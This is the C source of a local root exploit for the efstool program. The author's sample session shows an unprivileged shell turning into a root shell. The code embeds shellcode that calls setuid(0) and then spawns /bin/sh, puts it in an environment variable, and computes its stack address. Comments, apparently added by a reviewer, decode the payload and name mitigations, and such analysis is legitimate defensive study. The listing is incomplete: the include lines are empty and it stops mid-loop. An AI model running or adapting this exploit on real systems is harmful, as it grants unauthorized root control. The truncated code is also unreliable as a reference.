/* EFStool local exploit
* (no brute force capabilities..cuz its umm..*local*)
*
* e-mail: Hi_Tech_Asslemon@hairdresser.net
*
* coded by: Hi_Tech_Asslemon
*/
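/*
Author's sample session. The program is started from an unprivileged
shell ($) and ends at a root prompt (#), i.e. a local privilege escalation:

$ ./efstrip
EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon
Shellcode at: 0xbfffffbd (omfg it's magic@!@!@!)
sh-2.05#
*/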
#include
#include
#include
/* Absolute path of the targeted program. main() uses it only through
 * strlen(PATH) in the visible part of this listing; nothing here checks
 * that the file exists.
 * NOTE(review): the root prompt in the sample session implies the target
 * runs with elevated privileges (presumably installed setuid root; confirm
 * on the system under review). Removing that bit or applying the vendor
 * fix removes the impact. */
#define PATH "/opt/gnome/bin/efstool"
/* Raw i386 Linux machine code (int 0x80 system-call convention) stored as
 * a byte string. Decoded from the bytes below:
 *   - eax and ebx are zeroed, then system call 0x17 (setuid) is made with
 *     argument 0;
 *   - the string "//bin/sh" is built on the stack and system call 0x0b
 *     (execve) is made on it.
 * The sequence contains no 0x00 byte other than the literal's terminator.
 *
 * Defensive notes:
 *   - the setuid(0) call only succeeds in a process that already holds
 *     root effective privileges, so the payload is only useful against a
 *     privileged target;
 *   - the byte sequence is constant and can serve as a static signature
 *     for file or memory scanning;
 *   - the sample output shows a fixed stack address (0xbfffffbd), so the
 *     technique depends on a predictable, executable stack; address-space
 *     randomization and non-executable stacks are the generic mitigations. */
unsigned char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x50\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x89\xe1\x31\xd2\xb0"
"\x0c\x01\xc1\x89\x19\xfe\xc8\xcd\x80";
/* Process environment block; main() passes it to execve() when it
 * re-executes itself. */
extern char **environ;
int
main(int argc, char **argv)
{
unsigned long ret;
unsigned char *p;
unsigned char *run[3];
unsigned char buf[3000]; /* tnx str9 */
unsigned int i;
p=NULL;
if((p=getenv("FOO"))==NULL)
{
if(setenv("FOO",code,1)==-1) exit(1);
if(execve(argv[0],argv,environ)) exit(1);
}
printf("EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon\n\n");
ret=(long)p;
ret+=(strlen(argv[0])-strlen(PATH));
printf("Shellcode at: %p (omfg it's magic@!@!@!)\n",ret);
for(i=0;i |